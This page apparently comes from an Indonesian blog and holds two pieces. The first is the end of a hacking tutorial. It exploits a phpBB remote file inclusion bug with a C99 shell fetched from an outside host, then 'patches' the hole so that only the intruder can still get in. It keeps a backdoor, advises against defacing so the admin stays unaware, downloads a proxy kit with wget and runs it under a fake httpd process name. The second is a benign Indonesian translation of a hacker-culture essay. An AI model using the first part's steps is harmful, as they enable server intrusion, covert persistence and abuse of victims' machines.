Patching yang kita lakukan terhadap RFI (Remote File Inclusion) Vulnerability ini akan lebih mudah jika dilakukan dengan PHP Shell Injector sejenis C99 yang mempunyai fitur untuk memanipulasi (editing) source file.
Syarat utama melakukan Patching ini yaitu celah keamanan harus berada pada direktori dengan permission 777 (Kecuali kalau kamu punya akses root, kamu bisa melakukan patching di direktori mana pun)
Ada tiga cara yang mungkin bisa kita lakukan untuk patching sebuah RFI Vulnerability, yaitu :

1. Memodifikasi file yang merupakan bug RFI

Coba kamu lakukan lagi PHP Injection dengan menggunakan PHP Shell Injector C99, misalnya seperti di bawah ini :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe99.txt?

Coba perhatikan gambar hasil PHP Shell Injection tersebut :

Nah, di situ akan terlihat perbedaan warna file yang merupakan bug RFI dari target yaitu warna kuning. Atau bisa dilihat dari url PHP Injection di atas tadi. Bug-nya adalah nama file paling belakang dan sebelum tanda tanya, yaitu file usercp_sendpasswd.php. Sekarang anda tinggal klik tulisan edit di ujung yang sebaris dengan file tersebut pada shell c99 (lihat gambar di atas) yang akan menampilkan isi atau source dari file tersebut, seperti ini :

Setelah itu carilah bagian yang serupa dengan tulisan di atas yang bertuliskan include($phpbb_root_path["user"], karena memang bagian ini lah yang bermasalah (bug RFI-nya) sehingga memungkinkan seorang attacker masuk melaluinya (liat lagi URL PHP Injection tadi). Kemudian lanjutkan dengan mengubah tulisan user di atas dengan nama lain misalnya menjadi seperti ini : include($phpbb_root_path["newbee"]. Setelah itu klik save untuk menyimpannya.
Sekarang coba tes melakukan PHP Injection lagi terhadap target seperti pada awal. Hasilnya mungkin akan seperti ini :

Itu berarti celah keamanan tadi telah berhasil dipatch! Pesan error yang muncul tidak mesti selalu sama seperti di atas, dapat juga berbeda-beda tergantung target dan celah keamanannya, bisa saja memunculkan pesan Fatal Error atau lainnya.

2. Ubah nama file tersebut

Cara kedua ini adalah cara yang paling mudah yaitu dengan mengubah nama file bug tersebut di atas dengan nama lain. Sebelum mengubah nama, ganti dulu permission file tersebut menjadi 777 agar bisa melakukan manipulasi terhadapnya, caranya:

chmod 777 usercp_sendpasswd.php

Setelah itu baru ubah nama file tersebut, misalnya dengan perintah ini :

mv usercp_sendpasswd.php newbee.php

Maka file bug tersebut akan berubah nama menjadi newbee.php sehingga URL PHP Injection hasil scan di atas tadi menjadi tidak valid lagi (berubah).

3. Hapus file tersebut

Cara ketiga ini juga mudah sekali sama halnya dengan cara kedua yaitu tinggal hapus aja file yang jadi bug RFI-nya. Beres kan? Gak ada lagi file yang bisa diinjeksi kalau file itu sendiri sudah tidak ada. Caranya seperti di atas, ubah dulu permission filenya menjadi 777 lalu tinggal eksekusi aja perintah ini : rm usercp_sendpasswd.php
Coba aja kamu tes lagi melakukan PHP Injection dari awal setelah kamu memakai cara kedua atau cara ketiga. Pasti hasilnya akan seperti atau mirp di bawah ini :

Itu berarti celah keamanan tadi telah ditutup, dan ingat! Jika kamu tidak memiliki akses root, maka kamu HANYA bisa melakukan patching seperti di atas apabila dalam kondisi file bug tersebut berada di direktori 777.
Sector Clear! Patching udah. Lalu gimana donk kita masuk lagi ke shell target kalau PHP Injection gak bisa lagi???
Lah, kan tadi kamu uda pasang backdoor. Masuk aja lewat situ… hehehe.. mulai paham kan algoritmanya? Gampang kan?
Tapi ada cara lain lagi untuk memasuki target tanpa menggunakan backdoor, yaitu dengan menggunakan PHP Shell Injection lagi, namun hanya bisa dilakukan jika kamu menggunakan cara pertama atau kedua saja :

1. Jika kamu melakukan patching dengan cara pertama, maka kamu bisa masuk ke target dengan PHP Injection ini :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[newbee]=http://h1.ripway.com/newbe/kambe99.txt?

Lihat tulisan yang miring di atas, itu karena kamu telah mengubah tulisan user menjadi newbee pada cara pertama. (dan hanya kamu yang mengetahui path tersebut).

2. Jika kamu melakukan patching dengan cara kedua, maka kamu bisa masuk ke target dengan PHP Injection ini :

http://intruder.gmork.cz/forum//includes/newbee.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe99.txt?

Lihat tulisan miring di atas, itu terjadi karena kamu mengubah file usercp_sendpasswd.php menjadi newbee.php pada cara patching kedua.

Patching yang baik sebenarnya bukanlah dengan cara-cara di atas, tapi seorang admin harus membuat code program tambahan untuk memfilter suatu statemen inlcude seperti di atas misalnya saja dengan statemen switch, for, ataupun case agar file tersebut dapat berfungsi dengan seharusnya.

Sekarang minum lagi kopi susunya tadi, ntar keburu dingin loh. Nyante aja udah, kamu dah punya backdoor di sebuah website. Lalu ngapain lagi ya? Deface? Kayaknya gak perlu deh, kalau kamu deface tuh website sama aja ibaratnya kamu kirim surat ke rumah orang yang kamu susupi dan mengatakan ”Hey om! Aku dah pasang pintu rahasia di rumah kamu, jadi aku sekarang bebas berkeliaran di rumah kamu sekalipun kamu kunci semua pintu lainnya!!!”. Si admin tuh website yang tahu keberadaan kamu pasti menggunakan berbagai macam cara untuk mendeteksi backdoor yang kamu pasang tadi, ini tentu aja akan menambah peluang dalam memperpendek umur backdoor kamu yang amat sangat berguna itu.
Daripada melakukakan hal-hal seperti di atas, kamu bisa aja memanfaatkan website tersebut untuk hal-hal menarik lainnya, misalnya aja membuat website itu sebagai proxy server pribadi kamu.

4. CREATE PROXY
- Landasan Teori

Proxy itu apa om? Sejenis makanan ringan itu ya?
Bukan kaleee. Proxy itu adalah sebuah aplikasi yang menjadi media perantara antara kamu (sebagai client) dan ISP sebagai penyedia jasa internet. Sehingga IP address yang kamu pakai atau yang terkoneksi dengan website saat berinternet adalah ip address dari server proxy tersebut. Yang kamu perlu konfigurasikan hanyalah mengatur nama server proxy dan port-nya saja pada browser.

- Saatnya Bereaksi! Eh.. Beraksi!

1. Buka backdoor kamu tadi.

2. Transfer file kompresan proxy.tgz ke dalam target dengan perintah:

wget http://www.mith.com/db/osr/proxy.tgz

3. Dekompresi (extract) file tersebut :

tar -zxvf proxy.tgz

Hasilnya dekompresi tersebut berupa sebuah folder bernama pro

4. Masuk ke direktori tempat hasil dekompresi yaitu direktori pro tadi :

cd /var/www/intruder/forum/db/pro atau bisa kamu lakukan secara manual saja.
Isi dari folder pro tersebut adalah file xh dan prox

5. Atur port dan jalankan :

./xh -s “/usr/sbin/httpd” –d ./prox -a -d –p1234

Maksud perintah di atas adalah mengeksekusi file xh untuk membuat proses dengan nama palsu (fake process) yaitu /usr/sbin/httpd dan menjalankannya sebagai daemon/system (-d) atau berjalan di background untuk program proxy kamu tadi (prox) yang berjalan pada port 1234.

Yang perlu diingat cuman portnya itu kamu set 1234, terserah kalau kamu mau kasih port lain.

Kalau tidak ada pesan error, berarti semua berjalan lancar. Kalau kamu memakai proxy tersebut, tinggal masukan IP dan PORT proxy tersebut ke dalam settingan browser misalnya Mozilla seperti gambar di bawah ini :

IP proxy di atas adalah IP dari website target tadi. Bisa kamu cek di http://who.is
Setelah sudah disetting, baru cek lagi di http://who.is apakah berfungsi atau tidak. Dan lihat IP kamu di sana apakah sudah berubah mengikuti IP proxy tersebut.

Selamat… Proxy kamu aktif. Kalau tidak berhasil bisa saja terjadi karena ISP (Penyedia Layanan Internet) kamu tidak mengizinkan adanya akses yang menggunakan proxy melalui server mereka.

—————————— Potong di sini ————————————-

Selesai juga akhirnya… Piuuwwhh….
Tapi lega juga…ho ho ho

/* Tutorial ini hanya sekedar untuk edukasi dan pengetahuan tentang security khususnya cara melakukan penetration test terhadap website sendiri lalu melakukan patching sederhana dan cepat. Segala kerusakan atau kerugian yang terjadi karena penyalahgunaan tutorial ini adalah bukan tanggung jawab saya. */

{

Maaf kalau tutorialnya masih berkualitas newbie dan masih ada salah di sana sini, namun kembali lagi mengutip dan memodifikasi kalimat dari om n0c0py (kemungkinan gay) :
”Lebih baik mempunyai sedikit ilmu tapi mau berbagi dengan yang lain daripada mempunyai banyak ilmu tapi hanya berdiam diri dan menyimpan untuk diri sendiri saja.”

}

Sumber : Saburai.site50.net

Cara Menjadi Seorang Hacker

2010-02-21T20:26:00.000-08:00

Mengapa Dokumen Ini?Sebagai seorang editor dari Jargon File, seringkali saya mendapatkan email permohonan dari kalangan newbie yang antusias menanyakan (seperti) “Bagaimana saya bisa belajar menjadi seorang hacker yang handal?” Cukup aneh juga, karena mereka tidak melihat dan membaca berbagai FAQ atau dokumentasi web yang mengulas pertanyaan penting ini, jadi inilah masalah utamanya.Jika anda membaca cuplikan dokumen offline ini, versi onlinenya ada di http://www.ccil.org/~esr/faqs/hacker-howto.htmlApakah Hacker itu?Jargon File yang berisikan penjelasan istilah hacker yang terkait erat dengan keahlian teknis dan senang memecahkan masalah serta melampaui batasan yang ada.

Jika anda ingin tahu cara menjadi seorang hacker, hanya ada dua hal yang benar-benar relevan.Ada sebuah komunitas, budaya saling berbagi informasi, dari kaum programmer ahli dan pakar jaringan yang melalui sejarah saat pertama kali minicomputer diciptakan dan awal mula eksperimen ARPAnet. Para anggota budaya ini asal sebenarnya istilah ’hacker’. Hacker yang membangun internet, hacker menciptakan sistem operasi UNIX hingga hari ini. Hacker pula yang menjadikan World Wide Web bekerja. Jika anda merupakan bagian dari budaya ini, jika anda berkontribusi didalamnya dan mereka mengenal anda serta menyebut anda seorang hacker, maka anda memang benar seorang hacker.Pola pikir hacker tidak terbatas pada budaha software-hacker. Ada beberapa orang yang menerapkan sikap hacker tersebut pada hal lainnya, seperti elektronik atau musik – sebenarnya, disini anda dapat menemukan tingkat tertinggi dari ilmu pengetahuan atau seni. Sedangkan software hacker mengenal semangat juang ini dimanapun mereka berada dan menyebut diri mereka “hacker” juga – dan beberapa klaim bahwa dunia hacker tidak terbatas pada dimana mereka bekerja. Namun dalam dokumen ini kita hanya berfokus pada keahlian dan sikap para software hacker, dan tradisi saling berbagi yang mengawali istilah ‘hacker’.Adapula kelompok lain yang menyebut diri mereka hacker, namun sebenarnya tidak. Orang-orang ini (terutama dikalangan remaja) lyang melakukan kerusakan komputer dan membobol sistem telepon.
Para hacker yang sejati menyebut mereka sebagai ‘cracker’ dan tidak ada kaitannya dengan mereka. Hacker sejati menganggap cracker adalah pemalas, tidak bertanggung jawab dan pandai, dan kemampuan yang mereka miliki hanya untuk membobol sistem keamanan tidak lantas menjadi mereka hacker sebagaimana halnya jika anda mampu menjalankan mobil juga tidak lantas menjadikan anda seorang insinyur otomotif. Sayangnya, banyak sekali para jurnalis dan penulis yang salah dalam menggunakan kata ‘hacker’ untuk menggambarkan cracker; hal ini menodai citra hacker sejati.Perbedaan dasar antar hacker dan cracker: hacker membangun sesuatu, crackerlah yang merusaknya.Jika anda ingin menjadi seorang hacker, banyaklah membaca. Jika anda ingin menjadi seorang hacker, bacalah alt.2600 newsgroup dan bersiap-siaplah untuk melakukan 5 dari 10 perbuatan tercela setelah menyadari bahwa anda tidaklah secerdas yang anda kira. Dan itulah mengapa saya menggolongkan anda sebagai cracker.Sikap HackerHacker memecahkan masalah dan membangun sesuatu, dan mereka meyakini kebebasan dan saling membantu satu sama lainnya dengan sukarela.
Untuk diterima sebagai seorang hacker, anda harus berperilakuk seolah-olah hal itu merupakan sikap anda sendiri. Dan untuk berperilaku seakan-akan anda memiliki sikap tersebut, terlebih dahulu anda harus meyakini kebenaran sikap tersebut.Tapi jika anda mengira menerapkan sikap hacker merupakan suatu cara untuk diterima dalam budaya hacker tersebut, anda salah besar. Menjadi orang yang memiliki sikap hacker sangatlah penting bagi anda – untuk membantu anda belajar dan terus termotivasi. Sebagaimana halnya seni penciptaan, cara paling efektif untuk menjadi seorang master adalah berpikir dan bertindak bahwa anda benar-benar seorang master – tidak hanya secara intelektual namun juga secara emosional.Jadi, jika anda ingin menjadi seorang hacker, teruslah mengulang-ulang hal tersebut hingga anda benar-benar menjadi salah satu diantara mereka.1. Dunia yang penuh pesona masalah telah menunggu untuk diatasi.Menjadi seorang hacker sangatlah menyenangkan, namun jenis kesenangan yang diperoleh membutuhkan banyak usaha. Usaha yang memerlukan motivasi. Kesuksesan seorang atlet memerlukan motivasi akan bentuk fisik yang bagus, yang mendorong mereka mengatasi keterbatasan fisik mereka.Sama halnya, untuk menjadi seorang hacker anda perlu keterampilan dasar dalam memecahkan masalah, mempertajam kemampuan dan melatih kecerdasan anda tanpa henti.Jika anda jenis orang yang seperti itu secara alami, anda perlu memiliki tujuan untuk menjadi seorang hacker. Dengan kata lain anda memerlukan semangat hacking yang tidak dirusak dengan mengumbar nafsu seks, uang dan cemoohan masyarakat.(anda juga harus mengembangkan ketekunan dalam belajar – mempercaya bahwa meskipun anda tidak mengetahui semua yang anda perlukan dalam memecahkan masalah, jika anda hanya mampu mengungkap sebagian dan belajar dari hal itu, anda telah cukup belajar mengatasi masalah dibagian berikutnya – dan seterusnya, hingga anda benar-benar berhasil.)2. Tak seorangpun harus mengatasi masalah dua kaliPemikiran kreatif sangatlah berharga, sumber dayanya terbatas.
Tidak seharusnya mereka memboroskan waktu dengan masalah yang sama berulang-ulang disaat berbagai masalah baru telah menunggu diluar sana.Untuk berperilaku seperti seorang hacker, anda harus yakin bahwa waktu berpkir hacker lain sangatlah jitu – jadi nyaris merupakan tugas moral bagi anda untuk berbagi informasi, memecahkan masalah dan memberikan solusi lebih jauh agar hacker lainnya dapat mengatasi masalah yang baru ketimbang menghabiskan waktu pada masalah yang sama berulang-ulang.(Anda tidak perlu percaya bahwa anda harus memberikan seluruh produk kreatif anda, meski para hacker ada pula yang melakukannya untuk memperoleh respek dari hacker lainnya. Konsistensi nilai-nilai hacker untuk menjual produknya hanyalah sekedar untuk makan dan biaya sewa komputer. Konsistensi dalam menggunakan keahlian hacking anda untuk mendukung keluarga atau memperoleh kekayaan, tidak apa-apa sepanjang anda tidak lupa bahwa anda adalah seorang hacker.)3. Bosan dan kejenuhan adalah musuh utama.Kaum hakcer (dan orang-orang kreatif pada umumnya), semestinya tidak pernah menjadi bosan atau jenuh terhadap pekerjaan rutin, karena saat hal ini terjadi maksdunya mereka tidak melakukan apa yang mereka mampu lakukan – memecahkan masalah baru. Hal ini hanya akan menyakit perasaan setiap orang. Oleh karena itu bosan dan kejenuhan bukan hanya tidak diinginkan melainkan juga musuh utama.Untuk berperilakuk sebagai seorang hacker, anda harus percaya hal ini cukup untuk berada sejauh mungkin dari kebosanan, tidak hanya untuk diri anda sendiri namun juga bagi orang lain (khususnya hacker lainnya).(Terdapat beberapa pengecualian untuk hal ini.
Para hacker terkadang melakukan sesuatu yang tampaknya berulang-ulang atau membosankan untuk memperhatikan dan melatih kejernihan pikirannya, bertujuan untuk mempertajam kemampuan atau mendapatkan beberapa pengalaman tertentu yang tidak dimiliki oleh orang lain. Namun dengan pilihan ini – tak seorang pun bisa memperkirakan kapan mereka terperosok dalam kejenuhan.)4. Kebebasan adalah hal yang baik.Kaum hacker pada dasarnya anti-penguasa. Setiap orang yang mencekoki anda denga pemikiran ala penguasa, pada umumnya memiliki beberapa alasan tertentu untuk melakukannya pula. Jadi sikap sok berkuasa harus dilawan dimanapun anda berada, untuk mengurangi jeratan yang melilit anda dan para hacker lainnya.(Hal ini tidak berarti melawan seluruh penguasa.
Anak-anak perlu dididik dan kejahatan harus dicegah. Seorang hacker bisa menerima beberapa jenis kekuasaan yang bertujuan sama dengan yang dia inginkan daripada menghabiskan waktunya dengan menuruti tujuan lainnya. Namun adakalanya perlu dilakukan tawar-menawar, jenis penyerahan diri pada kekuasaan tidak akan pernah mereka berikan.)Para penguasa identik dengan penyensoran dan kerahasiaan. Mereka tidak pernah mempercayai ketulusan kerja sama dan berbagi informasi – mereka hanya menyukai ‘kerja sama’ yang dapat mereka kendalikan. Jadi untuk berperilaku sebagai seorang hacker, anda harus mengembangkan suatu kebencian terhadap penyensoran, kerahasiaan, dan penggunaan kekerasan atau tipu daya guna menghindari tanggung jawab. Dan anda harus bersedia bertindak berdasarkan keyakinan tersebut.5. Sikap tidak menggantikan keahlian.Untuk menjadi seorang hacker, anda harus mengembangkan beberapa sikap ini. Tapi membatasi diri pada sebuah sikap tunggal tidak akan menjadikan anda seorang hacker, atau apapun yang menjadikan anda sebagai seorang atlet juara atau bintang tenar.
Menjadi seorang ahcker memerlukan kecerdasan, latihan, dedikasi dan kerja keras.Oleh karena itu, anda harus belajar mempercayai sikap dan menghormati keahlian setiap orang. Kaum hacker tidak akan membiarkan pecundang membuang-buang waktu mereka, namun mereka menghormati keahlian – terutama keahlian hacking, keahlian apapun adalah baik. Keahlian membutuhkan keterampilan yang hanya beberapa master yang mampu, dan keahlian membutuhkan kecakapan yang terkait dengan sikap mental dan penjiwaan yang terbaik.Jika anda menyukai keahlian, anda akan suka mengembangkan diri anda sendiri – kerja keras dan dedikasi menjadi suatu permainan yang menarik daripada membosankan. Dan itu merupakan hal terpenting guna menjadi seorang hacker.Keahlian Dasar HackingSikap hacker sangatlah penting, tetapi keahlian jauh lebih penting.
Sikap tidak untuk mengganti keahlian, ada beberapa tolok ukur keterampilan dasar tertentu yang harus anda miliki sebelum anda bermimpi menjadi seorang hacker.Tolok ukur ini senantiasa berubah seiring dengan perkembangan teknologi yang membutuhkan keterampilan baru yang membuat usang keterampilan lam. Sebagai contoh, dulu pemrograman bahasa mesin sangat diperlukan tanpa perlu mempelajar sesuatu yang berhubungan dengan HTML. Namun di kahir 1996 sangatlah penting untuk menyertakan keahlian dalam bidang berikut ini:1. Belajar cara memprogram.Tentu saja, ini merupakan keahlian dasar hacking. Tahun 1997 anda harus mutlak menguasai bahasa C (bukan hanya sekedar coba-coba belajar). Anda bukanlah seorang hacker atau programmer jika anda hanya mengetahui satu bahasa – anda perlu belajar cara berpikir mengenai masalah pemrograman secara umum, tidak tergantung pada satu bahasa pemrograman saja. Untuk menjadi seorang hacker sejati, anda harus mendapatkan petunjuk dimana anda dapat mempelajari bahasa baru selama berhari-hari dengan menghubungkan petunjuk terhadap apa yang telah anda ketahui. Maksudnya anda harus mempelajari beberapa bahasa pemrograman yang berbeda.Disamping C, anda harus mempelakari LISP dan Perl (kalau perlu Java). Disamping pentingnya bahasa pemrograman, yang setiap bahasa tersebut memiliki pendekatan berbeda, dan memberikan anda pelajaran yang sangat berharga.Saya tidak dapat memberikan petunjuk lengkap cara belajar pemrograman itu disini – membutuhkan keahlian yang kompleks.
Namun saya bisa memberitahukan anda bahwa buku dan kursus tidak akan melakukan segalanya (mungkin kebanyakan karena pemikiran terbaik oleh para hacker). Apa yang perlu dilakukan adalah (a) membaca code dan (b) menulis code.Belajar memprogram seperti belajar bahasa menulis bahasa asli. Cara terbaik untuk melakukan hal tersebut adalah membaca materi yang ditulis oleh para master dibidang masing-masing, menuliskan beberapa hal tentang diri anda, membaca lebih banyak, menulis lebih sedikit, membaca lebih banyak lagi, menulis lebih banyak… dan terus diulang-ulang hingga anda mulai menulis untuk mengembangkan dan mempertajam kemampuan sesuai dengan yang anda inginkan.Dahulu, menemukan code yang bagus untuk dibaca sangatlah sulit, karena beberapa program besar hanya menyediakan sumbernya untuk para calon hacker yang membaca dan bekerja dengannya. Kini semuanya telah berubah secara dramatis antara lain; software gratis, tool pemrograman gratis, dan sistem operasi gratis (semuanya menyediakan kode sumber, dan seluruhnya dibangun oleh kaum hacker) serta digunakan secara luas.2. Memperoleh, mempelajari, dan menjalankan UNIX secara gratis.
Saya beranggapan anda telah memiliki personal computer atau dapat mengaksesnya ditempat lain. Langkah pertama yang terpenting bagi para newbie guna mendapatkan keahlian hacker adalah mendapatkan copy Linux atau salah satunya yakni free BSD-Unix, install pada komputer anda dan jalankan.Ya, ada beberapa sistem operasi lainnya selain Unix. Namun mereka terdistribusi dalam biner (terkompilasi) – anda tidak dapat membaca code tersebut, dan anda tidak dapat memodifikasinya. Mencoba belajar menghack melalui DOS atau Windows atau MacOS seperti sama halnya belajar menari dengan tubuh terikat.Selain Unix sebagai sistem operasi di Internet. Anda bisa saja belajar menggunakan Internet tanpa perlu mengenal Unix, tetapi anda tidak dapat menjadi seorang hacker internet tanpa memahaminya. Untuk alasan inilah, budaya hacker saat ini sangat berfokus pada Unix. (Hal ini tidaklah selalu benar, karena beberapa hacker generasi lama tidak menyukainya, namun simbiosis antara Unix dan Internet menjadi cukup kuat yang bahkan Microsoft tidak mampu menggoyahkannya.)Jadi, pelajarilah Unix – saya sendiri menyukai Linux namun ada cara lainnya. Mempelajarinya. Menjalankannya. Bekerja dengannya. Menghubungkannya ke internet. Membaca kode-nya. Dan memodifikasi kodenya. Anda akan mendapatkan alat pemrograman yang lebih baik (termasuk C, Lisp, dan Perl) ketimbang sistem operasi Microsoft yang anda impikan, anda memperoleh kesenangan, dan anda mendapatkan lebih banyak ilmu ketimbang anda merealisasikan yang telah anda pelajari hingga anda menoleh kebelakang sebagai seorang master hacker.Untuk mempelajari Unix, lihat The Loginataka.Untuk mempelajari Linux, lihat Where To Get Linux.3. Belajar Cara Menggunakan World Wide Web dan Menulis HTMLBanyak hal dari budaya hacker yang membangun pekerjaan mereka diluar dari hal ini, membantu menjalankan pabrik, perkantoran dan universitas tanpa berpengaruh langsung pada kehidupan orang-orang awam. Web adalah satu pengecualian terbesar, mainan hacker yang berkilauan ini diakui telah mengubah dunia ketimbang politik. Untuk alasan tunggal inilah, anda harus belajar cara bekerja dengan Web.Hal ini tidak berarti mempelajari cara menggunakan browser (siapapun dapat melakukan hal itu), namun mempelajari cara menulis HTML, bahasanya Web. Jika anda tidak mengetahui cara memprogram, menulis HTML yang membantu anda belajar. Bangunlah sebuah website.Namun hanya memiliki sebuah website tidak lantas menjadikan anda cukup baik untuk menjadi hacker.
Web merupakan himpunan home page. Anda memerlukan petunjuk tentang dunia HTML, lihat The HTML Hell Page).Agar berguna, halaman anda harus memiliki isi (content) – harus menarik dan/atau bermanfaat bagi hacker lainnya.Status Budaya HackerSeperti kebanyakan budaya tanpa kemandirian ekonomi, hackerdom memiliki reputasi. Anda mencoba memecahkan masalah yang menarik, namun betapa menariknya mereka, dan apakah solusi anda benar-benar baik, adalah suatu hal yang memerlukan kemampuan teknis atau kepakaran yang diperlukan untuk menilai.Berdasarkan hal itu, saat anda melakukan permainan hacker, anda belajar menjaga skor utama anda melalui apa yang hacker lain pikirkan tentang keahlian anda (inilah mengapa anda tidak benar-benar menjadi seorang hacker hingga hacker lainnya secara konsisten menyebut anda sebagai hacker). Kenyataannya adalah image yang tidak jelas tentang hacking seperti pekerjaan mereka yang terkungkung; juga dengan larangan budaya hacker (sekarang berangsur-angsur memudar tapi masih berpotensi) terhadap pengakuan bahwa ego atau pengakuan dunia luar merupakan salah satu dari motivasi seseorang.Khususnya, hackerdom adalah apa yang para ahli antropologi sebagai budaya terikat. Anda mendapatkan status dan reputasi didalamnya dengan tidak dengan mendominasi orang lain, tidak mengandalkan kecantikan, tidak memiliki sesuatu yang orang lain inginkan, namun memberikan sesuatu yang lebih berharga.
Khususnya, memberikan waktu anda, kreatifitas anda, dan hasil dari kemampuan anda.Ada 5 hal mendasar yang bisa anda lakukan untuk dihormati oleh para hacker:1. Menulis Software Gratis Anda.Hal pertama (pada umumnya) adalah menulis program yang hacker lain anggap sangat menyenangkan dan bermanfaat, dan memberikan sumber program ke dunia hacker untuk digunakan.Hackerdom seperti kelompok manusia setengah dewa yang menulis sebagian besar, program hebat yang kita temui diseluruh dunia dan banyak digunakan oleh setiap orang.2. Membantu Menguji dan Mendebug Software Gratis.Mereka juga melayani orang-orang yang membuat dan mendebug software gratis. Dalam dunia yang tidak sempurna ini, kita tidak dapat menghindari sebagian besar waktu yang dihabiskan dalam pengembangan software adalah saat mendebug. Itulah mengapa penulis software gratis orang-orang berpikir untuk memberitahukan anda bahwa penguji beta yang baik (siapapun yang mengetahui cara menggambarkan gejalanya, dan bersedia menerapkan beberapa contoh rutin diagnosanya) merupakan hadiah paling berharga bagi mereka.
Bahkan orang ini bisa membuat perbedaan antara fase mendebug yang memakan waktu lama, mimpi buruk yang menakutkan dan orang itu mau bersusah-payah demi sesuatu yang berguna.Jika anda seorang newbie, cobalah mencari sebuah program yang masih dikembangkan, bahwa anda tertarik dengannya dan menjadi seorang penguji beta yang baik. Itulah sifat alami untuk membantu menguji program membantu mendebug-nya guna membantu mereka memodifikasi. Banyak hal yang dapat anda pelajari dalam hal ini, dan memberikan anda karma yang baik pada orang-orang yang anda bantu di kemudian hari.3. Publikasikan informasi yang berguna.Hal baik lainnya adalah mengumpulkan dan menyaring informasi yang berguna dan menarik pada halaman web atau dokumentasi seperti FAQ (Frequently Asked Question) dan tersedia untuk umum.Pemelihara sebagaian besar FAQ teknis juga mendapatkan kehormatan yang sama dengan penulis software gratis.4. Membantu menjaga kerja infrastruktur.
Budaya hacker (dan pengembangan mesin Internet dijalankan oleh para sukarelawan. Ada banyak kebutuhan namun kerja yang tidak glamour senantiasa dikerjakan – mengadministrasi mailing list, memoderasi newsgroup, memelihara situs arsip software yang besar, mengembangkan RFC dan standar teknis lainnya.Orang-orang yang melakukan hal ini layak mendapatkan kehormatan, karena setiap orang mengetahui pekerjaan ini memakan banyak waktu dan tenaga serta tidak banyak kesenangan yang didapat sebagaimana bermain-main dengan kode. Mereka telah menunjukkan dedikasinya.5. Melayani budaya hacker itu sendiri.Akhirnya, anda bisa melayani dan menyebarluaskan budaya itu sendiri (misalkan tentang cara terbaik untuk menjadi seorang hacker :-)).Ini bukanlah sesuatu yang harus anda lakukan telah anda menjadi terkenal dan melakukan 4 hal diatas.Budaya hacker tidak memiliki pemimpin, tepatnya, namun mereka memiliki pahlawan dan adat-istiadat turun menurun dan bahasa. Saat anda melakukan perjalanan yang cukup panjang, mungkin anda tumbuh disini. Waspadalah: para hacker tidak mempercayai egoisme dalam budaya mereka, jadi sejauh mata memandang, egoisme dikenal sangat berbahaya. Ketimbang berupaya untuk hal itu, anda harus menyadari urutan posisi anda sendiri dan menjadi teladan dan bersikap ramah mengenai status anda.
The Hacker/Nerd ConnectionBerlawanan dengan mitos terkenal, anda tidak harus menjadi seorang nerd untuk menjadi seorang hacker. Hal itu memang membantu, bagaimanapun juga, dan sebagian hacker adalah nerd yang sebenarnya. Menjadi seorang terkucil dari masyarakat membantu anda tetap terkonsentrasi pada hal yang benar-benar penting, seperti berpikir dan hacking.Untuk alasan inilah, sebagian hacker mengadopsi label ‘nerd’ dan bahkan menggunakan istilah lebih keras, yakni ‘geek’ sebagai badge kebanggaan mereka – inilah suatu cara menyatakan independensi mereka dari anggapan masyarakat awam. Lihat The Geek Page untuk pembahasan lebih lanjut.Jika anda bisa mengatur konsentrasi yang layak pada hacking untuk menjadi lebih baik dan masih memiliki kehidupan, itu sangat baik. Sekarang lebih mudah daripada saat saya masih menjadi seorang newbie; adat budayanya jauh lebih bersahabat terhadap techno-nerd. Ada beberapa orang yang menyatakan bahwa para hacker merupakan calon pacar/suami/istri yang berkualitas tinggi. Untuk informasi lebih jauh tentang hal ini silakan lihat Girl's Guide to Geek Guys.Jika anda tertarik pada hacking karena anda tidak memiliki penghidupan, tidak masalah juga – setidaknya anda tidak memiliki kesulitan dalam konsentrasi.
Mungkin anda akan mendapatkan jodoh, suatu hari nanti.Titik GayaSekali lagi, untuk menjadi seorang hacker, anda harus memiliki pola pikir seorang hacker. ada beberapa hal yang bisa anda lakukan saat anda tidak berada di depan komputer untuk membantu orang lain. Hal ini mungkin saja tidak berhubungan dengan hacking namun sebagian hacker melakukannya, dan merasa bahwa mereka memiliki ketertarikan di bidang yang sama.
Bacalah buku fiksi sains. Pergilah ke pertemuan fiksi sains (cara terbaik untuk berjumpa dengan hacker dan proto-hacker).
Study Zen, dan/atau mengambil seni beladiri. (disiplin jiwa sangatlah penting.)
Mengembangkan kemampuan bermain musik. Belajar mengapresiasikan jenis musik khusus. Belajar memainkan beberapa instrumen musik dengan baik, atau cara menyanyi.
Mengembangkan apresiasi anda dengan mengikuti kuis berhadiah.
Belajar menulis dalam bahasa asing dengan baik. (sejumlah hacker juga adalah seorang penulis buku.)Ada banyak hal yang harus anda lakukan, terutama adalah bahwa anda memiliki kapasitas sebagai seorang hacker. Mampu menggunakan kecakapan otak sebelah kiri dan kanannya adalah sangat penting (para hacker harus mampu berpikir secara logis dan bertindak tidak logis guna memecahkan masalah suatu waktu.)Akhirnya, beberapa hal yang tidak boleh dilakukan.
Jangan bertindak bodoh, membesar-besarkan user ID atau screen name.
Jangan mengobarkan kebencian di Usenet (atau ditempat lainnya)
Jangan menggelari diri anda sendiri sebagai ‘cyberpunk’, dan jangan membuang-buang waktu anda pada setiap orang.
Jangan memposting atau menulis email yang dipenuhi kesalahan eja dan tata bahasa yang buruk.Jangan menjadikan diri anda atau orang lain sebagai bahan ejekan. Para hacker memiliki ingatan yang panjang – yang mengakibatkan anda perlu waktu bertahun-tahun agar anda bisa diterima.Narasumber lainnyaTerjemahan dokumen ini tersedia dalam bahasa Prancis, Spanyol dan Jepang.Loginataka memiliki beberapa hal untuk disampaikan mengenai pelatihan dan sikap yang layak dari seorang Unix Hacker.Saya juga telah menulis mengenai A Brief History Of HackerdomPeter Seeback memelihara suatu Hacker FAQ yang luar biasa ini bagi para manager yang tidak memahami cara bergaul dengan hacker.Saya telah menulis sebuah paper, The Cathedral and the Bazaar, yang menjelaskan seluk beluk budaya Linux. Anda dapat menemukannya di halaman ini.Frequently Asked Questions (Pertanyaan yang seringkali diajukan)Q: Bersediakan anda mengajari saya cara melakukan Hack?Semenjak awal publikasi halaman ini, saya banyak mendapat permintaan dari orang mengenai “ajari saya semua tentang hacking”. Sayangnya, saya tidak memiliki waktu atau energi untuk melakukan hal ini; proyek hacking saya sendiri memerlukan 110% dari waktu saya.Bahkan bila saya melakukannya, hacking adalah suatu sikap dan keahlian yang pada dasarnya harus anda miliki untuk mengajarkan diri anda sendiri.
